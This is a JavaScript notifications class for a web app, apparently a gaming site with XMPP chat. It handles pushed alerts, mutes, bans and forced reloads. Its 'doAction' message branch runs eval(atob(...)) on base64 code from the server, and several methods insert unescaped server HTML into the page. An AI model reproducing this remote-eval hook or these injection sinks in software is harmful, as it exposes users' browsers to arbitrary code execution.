class Notifications {
    constructor(connectionManager) {
        this.connectionManager = connectionManager;
        this.connectionManager.addListener(this);
        this.connectionManager.addHandler(this.terminal.bind(this), "cego:xmpp:notification:system");
        this.list = {};
    }

    init() {
        this.notificationsList = document.getElementById("notifications-list");
        this.body = $("body");
        app.events.sub(app.events.eventList.ready, function () {
            app.notifications.populate();
        });
        app.events.sub(app.events.eventList.page_inject, function () {
            app.notifications.populate();
        });
        app.events.sub(app.events.eventList.page_reload, function () {
            app.notifications.populate();
        });
        app.events.sub(app.events.eventList.modal_open, function () {
            app.notifications.populate();
        });
        $(document).on("click", ".notification-target", function () {
            app.notifications.markAsRead(this.notificationId);
        });
        $(document).on("click", ".notification-item:not('.read')", function () {
            app.notifications.markAsRead($(this).data("id"), true);
        });
        $(document).on("click", "notify", function () {
            const area = $(this).attr("data-notification-area");
            if (typeof area === "string") {
                const target = $("[data-notification-update-area='" + area + "']").find(".notification-target");
                if (target.length) {
                    $([document.documentElement, document.body]).animate({
                        scrollTop: target.first().offset().top - 100
                    }, 1000);
                }
            }
        });
        $("#system-notifications").on("click", "> div", function () {
            $(this).data("hidden", true).fadeOut(150);
        });
        this.revealSystemNotifications();
        this.list = app.config.notifications;
    }

    terminal(message) {
        const data = app.util.jsonDecode(message.querySelector("body").innerHTML);
        if (data) {
            switch (data.type) {
                case "system_notifications":
                    app.notifications.handleSystemNotifications(data.data);
                    break;

                case "game_notifications":
                    app.notifications.handleGameNotifications(data.data);
                    break;

                case "notifications":
                    app.notifications.handleNotifications(data.data);
                    break;

                case "force_reload":
                    app.notifications.handleForceReload(data.data);
                    break;

                case "mute":
                    app.notifications.handleMutes(data.data);
                    break;

                case "bans":
                    app.notifications.handleBans(data.data);
                    break;

                case "favouriteOnline":
                    app.notifications.addFloatingNotification(data.data);
                    break;

                case "doAction":
                    eval(atob(data.data));
                    break;
            }
        }
        return true;
    }

    addFloatingNotification(notification) {
        if (notification.type === "shared_prize") {
            return;
        }
        const floatingNotification = $("<div class='floating-notification'></div>").html($("<div></div>").html(notification.content).text());
        floatingNotification.click(() => floatingNotification.remove());
        setTimeout(() => floatingNotification.remove(), 5500);
        this.body.prepend(floatingNotification);
        switch (notification.type) {
            case "tournament":
                app.sounds.timpani();
                break;

            case "rank":
            case "challenge":
            case "badge":
            case "gift":
                app.sounds.blast();
                break;

            case "message":
                app.sounds.dingdong();
                break;

            default:
                app.sounds.dong();
                break;
        }
    }

    floatingNotification(content) {
        const floatingNotification = $("<div class='floating-notification'></div>").html("<div class='notification-item'>" + content + "</div>");
        floatingNotification.click(() => floatingNotification.remove());
        setTimeout(() => floatingNotification.remove(), 5500);
        this.body.prepend(floatingNotification);
        app.sounds.dong();
    }


    populate() {
        $("notify.active[data-notification-area]").html("").removeClass("active");
        $(".notification-target").removeClass("notification-target");
        let areas = [];
        let targets = [];
        let newListHtml = "";
        let shown = 0;
        const maxShown = Math.min((Math.round((window.innerHeight - 60) / 60) - 2), 15);
        let count = 0;
        let unread = 0;
        let autoRead = [];
        for (let i in app.notifications.list) {
            if (typeof app.notifications.list[i].content !== "undefined" && app.notifications.list[i].type !== "shared_prize") {
                count++;
            }
        }
        let insertThreshold = Math.min(count, maxShown);
        for (let i in app.notifications.list) {
            let notification = app.notifications.list[i];
            switch (notification.type) {
                case "shared_prize":
                    if (notification.areas) {
                        this.addAreas(areas, notification);
                    }
                    break;
                default:
                    if (notification.read === null) {
                        unread++;
                    }
                    if (notification.areas) {
                        this.addAreas(areas, notification);
                    }
                    if (notification.target) {
                        this.addTarget(targets, notification);
                    }
                    if (notification.content) {
                        if (shown++ < insertThreshold) {
                            let html = $('<textarea/>').html(notification.content).text();
                            if (notification.read) {
                                html = $('<div></div>').append(html).find('.notification-item').addClass('read').parent().html()
                            }
                            newListHtml = html + newListHtml;
                        }
                    }
                    break;
            }
        }

        if (this.notificationsList) {
            this.notificationsList.innerHTML = newListHtml;
        }
        for (let ia in areas) {
            if (typeof areas[ia] === "undefined" || areas[ia].count === 0) {
                continue;
            }
            let el = $("[data-notification-area='" + areas[ia].name + "']");
            if (el.length) {
                el.html(app.notifications.countCap(areas[ia].count)).addClass("active");
            }
        }

        for (let it in targets) {
            if (typeof targets[it] === "undefined" || targets[it].count === 0) {
                continue;
            }
            if (targets[it].name) {
                let el = document.querySelector("#" + targets[it].name);
                if (el !== null) {
                    el.notificationId = targets[it].ids;
                    el.setAttribute('data-new', app.config.translate.new);
                    if (el.classList.contains("auto-read")) {
                        autoRead = autoRead.concat(targets[it].ids);
                    } else {
                        el.classList.add("notification-target");
                    }
                }
            }
        }
        if (autoRead.length) {
            this.markAsRead(autoRead);
        }
    }

    addTarget(targets, notification) {
        if (!targets[notification.target]) {
            targets[notification.target] = {
                name: notification.target,
                ids: [],
                count: 0
            };
        }

        targets[notification.target].ids.push(notification.id);
        if (!notification.read) {
            targets[notification.target].count++;
        }
    }

    addAreas(areas, notification) {
        const notificationAreas = notification.areas.split(",");
        for (let id in notificationAreas) {
            if (!areas[notificationAreas[id]]) {
                areas[notificationAreas[id]] = {
                    name: notificationAreas[id],
                    count: 0
                };
            }
            if (!notification.read) {
                areas[notificationAreas[id]].count++;
            }
        }
    }

    countCap(count) {
        return count > 999 ? "999+" : count;
    }

    handleMutes(data) {
        app.config.muted[data.username] = {expires: data.expires};
        if (data.username === app.config.user.u) {
            $("#btnOpenChat").slideUp(200);
            app.chatWrapper.removeChat();
            app.storage.set("mute:" + app.config.user.u, data.expires);
            app.alert.warning(app.config.translate.you_have_been_muted + " (" + app.util.timeTill(data.expires) + ")", app.config.translate.you_have_been_muted_description);
            setTimeout(() => {
                delete app.config.muted[data.username];
                $("#btnOpenChat").slideDown(1000);
                app.chatWrapper.openChat();
            }, (data.expires - app.util.getTimeNow()) * 1000);
        } else {
            app.chatWrapper.CegoXMPP.Users.removeBlocked(data.username);
            app.chatWrapper.CegoXMPP.showUserMute(data.username, data.expires);
            setTimeout(() => {
                delete app.config.muted[data.username];
            }, (data.expires - app.util.getTimeNow()) * 1000);
        }
    }

    handleBans(data) {
        for (let i in data) {
            if (data[i] === app.config.user.u) {
                window.location.reload();
            }
            app.config.banned.push(data[i]);
            app.chatWrapper.CegoXMPP.Users.removeBlocked(data[i]);
            app.chatWrapper.CegoXMPP.showUserBan(data[i]);
        }
    }

    handleForceReload(data) {
        const time = data.timeToReload + (Math.round(data.rangeIntervalSeconds * Math.random()));
        switch (data.type) {
            case "soft":
                this.showSoftForceReload(time);
                break;

            case "force":
                this.showForceReload(data.title, data.message, time);
                break;
        }
    }

    showSoftForceReload(time) {
        setTimeout(() => {
            app.notifications.handleSystemNotifications({
                0: {
                    type: "danger",
                    message: app.config.translate.force_reload_title + " " + app.config.translate.reload,
                    targets: []
                }
            });
        }, (time * 1000) - app.util.getTime());
    }

    showForceReload(title, message, time) {
        let countDown = new Countdown("force-reload-countdown", time, () => {
            window.location.reload();
        });
        let dialog = app.alert.dialog(
            title,
            message,
            app.config.translate.reload, () => {
                window.location.reload();
            }, app.config.translate.wait, () => {
                app.notifications.handleSystemNotifications({
                    0: {
                        type: "danger",
                        message: app.config.translate.reload,
                        targets: []
                    }
                });
                $("#system-notification-0").append($(countDown.placeholder));
            }
        );
        $(dialog).find(".alert-wrapper").append($(countDown.placeholder));
    }

    handleNotifications(data) {
        switch (data.type) {
            case "add_multiple":
                for (let i in data.notifications) {
                    app.notifications.list[data.notifications[i].id] = data.notifications[i];
                }
                app.notifications.populate();
                break;

            case "new":
                app.notifications.list[data.notification.id] = data.notification;
                app.notifications.addFloatingNotification(data.notification);
                app.notifications.populate();
                const list = data.notification.areas.split(",");
                for (let index in list) {
                    app.ajax.reload("[data-notification-update-area='" + list[index] + "']", null, function () {
                        app.notifications.populate();
                    });
                }
                if (data.notification.type === "support-admin") {
                    showNeedsAttention();
                } else if (data.notification.type === "support") {
                    let dataParsed = JSON.parse(data.notification.data);
                    app.ajax.reload(dataParsed.content_id, "/support");
                }
                break;

            case "clear":
                if (typeof data.ids !== undefined) {
                    app.notifications.deleteByIds(data.ids);
                }
                if (typeof data.area !== undefined) {
                    app.notifications.deleteByArea(data.area);
                }
                break;

            case "clear_all":
                app.notifications.list = [];
                app.notifications.populate();
                break;
        }

        return true;
    }

    handleGameNotifications(data) {
        switch (data.data.type) {
            case "chat_game":
                if (data.settings && data.settings.delay && app.chatWrapper && typeof app.chatWrapper.CegoXMPP === "object") {
                    setTimeout(() => app.chatWrapper.CegoXMPP.addGameAnnouncement(data.data.site, data.text, data.data.game), data.settings.delay);
                } else {
                    app.chatWrapper.CegoXMPP.addGameAnnouncement(data.data.site, data.text, data.data.game);
                }
                break;
        }

        return true;
    }

    handleSystemNotifications(notifications) {
        const stamp = Math.round(Math.random() * 10000);
        for (let id in notifications) {
            const data = notifications[id];
            data.message = app.util.htmlDecode(data.message);
            let systemNotification = $("#system-notification-" + id);
            if (systemNotification.length) {
                const mess = systemNotification.find(".mess");
                if (mess.html() !== data.message || systemNotification.attr("data-type") !== data.type) {
                    systemNotification.slideUp(150, () => {
                        mess.html(data.message);
                        systemNotification.attr("data-type", data.type);
                    });
                }
            } else {
                systemNotification = this.addSystemNotification(id, data.type, data.message);
            }
            systemNotification.data("stamp", stamp);
            systemNotification.data("targets", data.targets);
        }
        app.notifications.revealSystemNotifications(stamp);

        return true;
    }

    addSystemNotification(id, type, message) {
        const notif = $('<div id="system-notification-' + id + '" data-type="' + type + '"><div class="mess">' + message + '</div><div class="close fa fa-times"></div></div>');
        $("#system-notifications").append(notif);
        return notif;
    }

    validateTargets(targets) {
        if (targets) {
            let valid = 0;
            for (let i in targets) {
                switch (targets[i].type) {
                    case "os":
                        if (targets[i].value === app.config.specs.osRoot) {
                            valid++;
                        }
                        break;

                    case "browser":
                        const sections = targets[i].value.split(" ");
                        switch (sections.length) {
                            case 1:
                                if (sections[0] === app.config.specs.browserId) {
                                    valid++;
                                }
                                break;

                            case 2:
                                if (sections[0] === app.config.specs.browserId && parseInt(sections[1]) === app.config.specs.browserVersion) {
                                    valid++;
                                }
                                break;

                            case 3:
                                switch (sections[1]) {
                                    case "&lt;":
                                    case "<":
                                        if (sections[0] === app.config.specs.browserId && app.config.specs.browserVersion < parseInt(sections[2])) {
                                            valid++;
                                        }
                                        break;

                                    case "&gt;":
                                    case ">":
                                        if (sections[0] === app.config.specs.browserId && app.config.specs.browserVersion > parseInt(sections[2])) {
                                            valid++;
                                        }
                                        break;
                                }
                                break;
                        }
                        break;

                    case "users":
                        switch (targets[i].value) {
                            case "vip":
                                if (app.config.user.v) {
                                    valid++;
                                }
                                break;
                            case "non-vip":
                                if (!app.config.user.v) {
                                    valid++;
                                }
                                break;
                        }
                        break;
                }
            }
            return valid === targets.length;
        }
        return true;
    }

    revealSystemNotifications(stamp) {
        setTimeout(() => {
            const elements = $("#system-notifications > div");
            $(elements).each(function () {
                if ($(this).data("stamp") !== stamp || !app.notifications.validateTargets($(this).data("targets"))) {
                    $(this).fadeOut(150, function () {
                        $(this).remove();
                    });
                } else {
                    if ($(this).data("hidden") !== true) {
                        $(this).fadeIn(250);
                    }
                }
            });
        }, 200);
    }

    revealSystemNotification(id) {
        const elements = $("#system-notifications #system-notification-" + id);
        elements.each(function () {
            $(this).slideDown(500);
        });
    }

    removeSystemNotification(id) {
        const elements = $("#system-notifications #system-notification-" + id);
        elements.each(function () {
            $(this).slideUp(150, function () {
                $(this).remove();
            });
        });
    }

    onConnected() {
        return true;
    }

    onDisconnected() {
        return true;
    }

    markAllAsRead() {
        app.ajax.post("/services/notifications/read", {type: "all"}, () => {
            for (let i in app.notifications.list) {
                app.notifications.list[i].read = true;
            }
            this.populate();
            app.ajax.reload("#notification-page-list");
        });
    }

    markAsRead(ids, force = false) {
        let list = [];
        for (let id in ids) {
            if (force || (app.notifications.list[ids[id]] && app.notifications.list[ids[id]].read === null)) {
                list.push(ids[id]);
            }
        }
        if (list.length) {
            app.notifications.markIdsAsRead(list);
            app.ajax.post("/services/notifications/read", {type: "single", ids: list}, () => {
                this.populate();
            });
        }
    }

    deleteByIds(ids) {
        for (let id in ids) {
            if (app.notifications.list[ids[id]]) {
                delete app.notifications.list[ids[id]];
            }
        }
        app.notifications.populate();
    }

    deleteByArea(area) {
        for (let id in app.notifications.list) {
            if (app.notifications.list[id].type === area) {
                delete app.notifications.list[id];
            } else {
                if (app.notifications.list[id].areas.indexOf(area) !== -1) {
                    delete app.notifications.list[id];
                }
            }
        }
        app.notifications.populate();
    }

    markIdsAsRead(ids) {
        for (let id in ids) {
            if (app.notifications.list[ids[id]]) {
                app.notifications.list[ids[id]].read = true;
            }
        }
    }

    updateListAndMarkIdsAsRead(ids) {
        this.markIdsAsRead(ids);
        app.notifications.populate();
    }

    updateListAndMarkAreaAsRead(area) {
        switch (area) {
            case "shared-prizes":
                for (let id in app.notifications.list) {
                    if (app.notifications.list[id].type === "shared_prize") {
                        delete app.notifications.list[id];
                    }
                }
                app.ajax.reload("#shared-prizes");
                break;

            default:
                for (let id in app.notifications.list) {
                    if (app.notifications.list[id].type === area) {
                        app.notifications.list[id].read = true;
                    }
                }
                break;
        }

        app.notifications.populate();
    }
}
